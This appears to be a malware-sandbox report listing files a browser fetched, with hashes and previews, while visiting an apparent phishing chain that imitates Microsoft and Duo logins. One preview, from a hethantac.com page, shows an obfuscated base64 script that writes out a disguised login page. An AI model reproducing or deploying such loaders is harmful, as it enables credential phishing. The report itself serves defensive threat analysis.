                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{1373:function(e,t,
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):17174
                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (11150)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):67311
                                                                                                                                          Entropy (8bit):5.008339890250903
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:vgPzcMEe6q41wfaM8e6q4IX/ozWFhlLCl7wXDI3:vu61wD6IX/oaRHm
                                                                                                                                          MD5:A0D76EE4EEBE69597DFC903B5C4638F0
                                                                                                                                          SHA1:703E38DFA96E832E859B96153D892F20D932C48F
                                                                                                                                          SHA-256:8850E24B490C7F7E935F6B4269431C31FC68A20CC455E682960589E8BD287B0A
                                                                                                                                          SHA-512:14AD4CA47E3F4992C46EAB564032A170F28F5BB7FFE57A97D2984FC1B4DB555C0816685FB6EF06D1BDC1B173ADE9CC073CDBE3EAC64B9421245A0AB4F829E413
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/css/page/login.css?v=8850e
                                                                                                                                          Preview:html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.875rem;font-size:0.875rem;font-size:var(--size-font-base);font-weight:400;font-weight:400;font-weight:var(--weight-font-base);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-body);letter-spacing:0}p{margin-top:0;margin-bottom:0}.caption{font-size:0.75rem;font-size:0.75rem;font-size:var(--size-font-caption);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-caption);weight:400;weight:400;weight:var(--weight-font-caption-regular)}.caption--bold{weight:900;weight:900;weight:var(--weight-font-caption-bold)}.h1,h2,h3,h4,h5,h6{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:var(--size-font-header-medium);font-weight:900;fo
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6518
                                                                                                                                          Entropy (8bit):3.1521084065759277
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:GyJgMM8ZMMMME2MA8DzjHkr2QY0lsWZvDZpMETMMMM8BMMUEgMMMMMMMMPMMMMMX:GhHDiY0lXvzH/69Ekj+r/sH
                                                                                                                                          MD5:20CFAA5B470512D11E83DD9AA80108D1
                                                                                                                                          SHA1:6B1BF56025D1C4D1F03C59AE200878C091E8F162
                                                                                                                                          SHA-256:E3716418443B70443D794BBCD2A8020A2E67D5260D3FFF2EE8EF7FE5D51767F5
                                                                                                                                          SHA-512:1A33C475870A01330789650C1DA2035173C301EB9AABA65464BE9C1E177CF58FD32A2C8043B90970E96EB6E8E2E095895ADEFB836C31A9F20144818F8A7971D1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:............ .(...&... .... .(...N...(....... ..... .........................C.d.C.d.C.d.C.d.C.d0C.d.C.d.C.d.C.d.C.d.C.d.C.d5C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d............................J.i.C.d.C.d.C.d.C.d.C.d6C.d.C.d.C.d.................................J.j.C.d.C.d.C.d6C.d.C.d.C.d.C.d....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d.....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d....................................C.d.C.d.C.d.C.d5C.d.C.d.C.d.................................I.i.C.d.C.d.C.d6C.d.C.d.C.d.C.d............................H.h.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7765), with CRLF line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):20419
                                                                                                                                          Entropy (8bit):5.857780642869412
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:IDnuiHD5Z/o5iyvLQagZltCZdnuiHD5Z/o5iyvLQagZlXlrilr7Ph:IvD5Z/+iyTQZDtCZhD5Z/+iyTQZDXlrk
                                                                                                                                          MD5:FBAA85DEB55F9334A35F573F625E2E8F
                                                                                                                                          SHA1:2FA378C9D3ED4E628149427746CEA73BACBC5615
                                                                                                                                          SHA-256:5D867D721347BB087C3EE3E38B2141BF19703FD630A9354CF5333DBBE5842ABF
                                                                                                                                          SHA-512:642BAC72B7104986EA91A04212E9EE231A56BB5DD40BAC7FF2986456E42EB593CB8D163CB491EEF5CE4683D64D76AE24FC9F1161B55CB2729A7E5FE654581142
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://supernova.hethantac.com/3XdZQxT/
                                                                                                                                          Preview: The successful warrior is the average man, with laser-like focus. -->..<script>....if(atob("aHR0cHM6Ly9Bcll4LmhldGhhbnRhYy5jb20vM1hkWlF4VC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogI
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2672
                                                                                                                                          Entropy (8bit):6.640973516071413
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):49911
                                                                                                                                          Entropy (8bit):7.994516776763163
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (64616)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):449972
                                                                                                                                          Entropy (8bit):5.4486277762255035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:c7PuGBhXlRK2d/ZkpZYRsmA2pmBe9OpRUS4cEHKE0H3NX446:c7DBZkp6umhpsUSuN
                                                                                                                                          MD5:2330EDFA5D02BA27B4818454A04935E7
                                                                                                                                          SHA1:405CDD0091FA7D25CE504F71086F488A6193BBD2
                                                                                                                                          SHA-256:6379D57694ECB499626F889744FB47D1979DDE32C9F95BCAF48E318642A8C292
                                                                                                                                          SHA-512:895E0ABAFD9444621E421EEEA49C722DFC4590765F7E76C1CFD38ADFA9430F03BBFEA23A37FDF8D8536DBA54ACDF315EF40224FB3D77836531016A341BC9B3D7
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):72
                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):6518
                                                                                                                                          Entropy (8bit):3.1521084065759277
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:GyJgMM8ZMMMME2MA8DzjHkr2QY0lsWZvDZpMETMMMM8BMMUEgMMMMMMMMPMMMMMX:GhHDiY0lXvzH/69Ekj+r/sH
                                                                                                                                          MD5:20CFAA5B470512D11E83DD9AA80108D1
                                                                                                                                          SHA1:6B1BF56025D1C4D1F03C59AE200878C091E8F162
                                                                                                                                          SHA-256:E3716418443B70443D794BBCD2A8020A2E67D5260D3FFF2EE8EF7FE5D51767F5
                                                                                                                                          SHA-512:1A33C475870A01330789650C1DA2035173C301EB9AABA65464BE9C1E177CF58FD32A2C8043B90970E96EB6E8E2E095895ADEFB836C31A9F20144818F8A7971D1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/images/favicon_duo.ico?v=e3716
                                                                                                                                          Preview:............ .(...&... .... .(...N...(....... ..... .........................C.d.C.d.C.d.C.d.C.d0C.d.C.d.C.d.C.d.C.d.C.d.C.d5C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d............................J.i.C.d.C.d.C.d.C.d.C.d6C.d.C.d.C.d.................................J.j.C.d.C.d.C.d6C.d.C.d.C.d.C.d....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d.....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.....................................C.d.C.d.C.d.C.d.C.d.C.d.C.d....................................C.d.C.d.C.d.C.d5C.d.C.d.C.d.................................I.i.C.d.C.d.C.d6C.d.C.d.C.d.C.d............................H.h.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.d.C.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1592
                                                                                                                                          Entropy (8bit):4.205005284721148
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                          MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                          SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                          SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                          SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):36
                                                                                                                                          Entropy (8bit):4.503258334775644
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Eq62iczBr9ks:EqdiczBys
                                                                                                                                          MD5:06B313E93DD76909460FBFC0CD98CB6B
                                                                                                                                          SHA1:C4F9B2BBD840A4328F85F54873C434336A193888
                                                                                                                                          SHA-256:B4532478707B495D0BB1C21C314AEF959DD1A5E0F66E52DAD5FC332C8B697CBA
                                                                                                                                          SHA-512:EFD7E8195D9C126883C71FED3EFEDE55916848B784F8434ED2677DF5004436F7EDE9F80277CB4675C4DEB8F243B2705A3806B412FAA8842E039E9DC467C11645
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                          Preview:ChgKDQ3RW1FSGgQIVhgCIAEKBw1Xevf9GgA=
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (45797)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):406986
                                                                                                                                          Entropy (8bit):5.31836569617146
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:f5+ROkZBKxn7oW/sKni2JcPwRTQx4J77m7mBdhh2uZifxOjrCpaLmnF:uOkWxp/Fi9Nxe7maZc7F
                                                                                                                                          MD5:E40761677762EAB0692F86B259C7D744
                                                                                                                                          SHA1:34A9B50CEC6E1163CEEFCD4D394DB6524C89A854
                                                                                                                                          SHA-256:DA4A8DF0C326292B5BEE9C732B3C962FD67AAF2F99D850F1BF65068D573C5619
                                                                                                                                          SHA-512:04FA1D6074AD24E3ABAB53D1DE116A6B39B4BE3DFABC082427F1C5A169E50527561F160CC133C2AC4AEDC4E7AC404572F60E531A4618111EA74D138B2B0DD034
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(533).concat([f
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1043
                                                                                                                                          Entropy (8bit):4.732223522165644
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:hSG/UdfWDZSYVy5KEGWwvI35Jmrv0c0obXl6f:h/gONF/wpJmr8G1e
                                                                                                                                          MD5:44BF720F31B5F75C31B168A33917F16E
                                                                                                                                          SHA1:FC784F0D6E413F85686841997001A1E421C57437
                                                                                                                                          SHA-256:AB5D7957B1604C8E97D2CD5FCF4C89CED2BE0732CBCA6520B5C7FED43BBB07F0
                                                                                                                                          SHA-512:19952DD6F7C8FB02E83D97770D77522AB402CAF7DCDFEA690CA6D7EA416C7F2702231352715DC5166A938A813D0DD521F0C03BF6CB2DD50BC19F4C611444588B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<!DOCTYPE html>.. [if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->. [if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->. [if gt IE 9]> > <html lang="en"> <![endif]-->. <head>. <meta charset="utf-8">. <title>Oops</title>. <link rel="stylesheet" href="/static/css/page/errors.css">. <link rel="shortcut icon" href="/static/images/favicon_duo.ico">. </head>. <body>. <div class="container">. <img height="120px" alt="Error". src="/static/images/oops.png". srcset="/static/images/oops.png 1x, /static/images/oops@2x.png 2x". >.. <p class="large-text">Looks like we're having some server issues.</p>.. <hr>.. <p>If you think something is broken, report a problem.</p>.. <a class="button homepage-button" href="/">. Go to Homepage. </a>.. <a class="button report-button" href="https://duo.com/about/contact" target="_blank" rel="noreferrer noopener">. Report a Probl
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 59425
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):23030
                                                                                                                                          Entropy (8bit):7.98653674709203
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:NeyxuTgqzx6XJ6LyXmwpWELxGufekOwJ5aVAymWtYY8BzJcer5Mk2G2oF5igKsm:gy8TbBkJpWMgklsgWleNcerVn2oF5i/V
                                                                                                                                          MD5:52D83553D76196036032B637159DB8F8
                                                                                                                                          SHA1:D5E6D373EC09F2737AA93E02C30BB9713237EEF0
                                                                                                                                          SHA-256:AC44EFF7F38B144C6DDF82FBD2BE15C8F33B391CA45C693E66B6BF01F5672BE5
                                                                                                                                          SHA-512:6B9C091280D48E4D62B881CE1DD6E4AB297502C67695DB8CC5CE6DA6CCDEDB76CACFBBDC0ACFCCC5677251E637A14F7DEF7C841BB1E1CA180C26A990908B4D65
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:http://plimmerton.org.nz/jugz/
                                                                                                                                          Preview:...........iW.\.&...z....e...L..r."@...0..a.::.V0..e....>{..o.....KV.d.}...................R.....}.=.......o...KCykz..f..lTf../K*..fX...:...xI.f)...v...|\....d .%[L.r.........Y.C.d.b.:..Ra.8../......f..,..;K.IYde....M1.e60...2S.77...FE~.i...O...d\.S....mh.^*.a..$.|R.I$.q..`....%7....R.4...f...fh..S..1n..%.].....2..oi.....Mg.K...e......|....x4.O..N.......+]?/.......p............=....&Lw+9t..f.q..B.....mH%....u.d..p....yv/..O...7....,.FA.P.7.zU..oU.aB...&4..K'fj.X5....]iQ..K.s.c..,.(.cV.2..5...2.5...O.AcGW.@0..,.`iu....C.8.....x....'@.O.0..../k3I...xXN.`..*.\OT..I...*...........<..[.[.nG.Q.](dQ..D;...[9|B&.....fY.z...L.x..id........q%...p@g...]6g4...]:..Sr..3l..&.Y.i@6T..6..1C0.A.>~.d.?t...A.2..o+..{6..o...N...W.Ni+..'Ud..B..Vf...7.IYd.k......L..j.P0K.].^..B..0S..i.f.):K.Y)o]..\..R....vy.."*..|I..R....,..{.;K..L....n..F..Q.....v..X./.a....c3..C.7rP..U..K......&.S.......A6.q.q8..pr...~sfg..lx...n..\g..t`Q.R~'*.w.e.....Nqe.w..o....
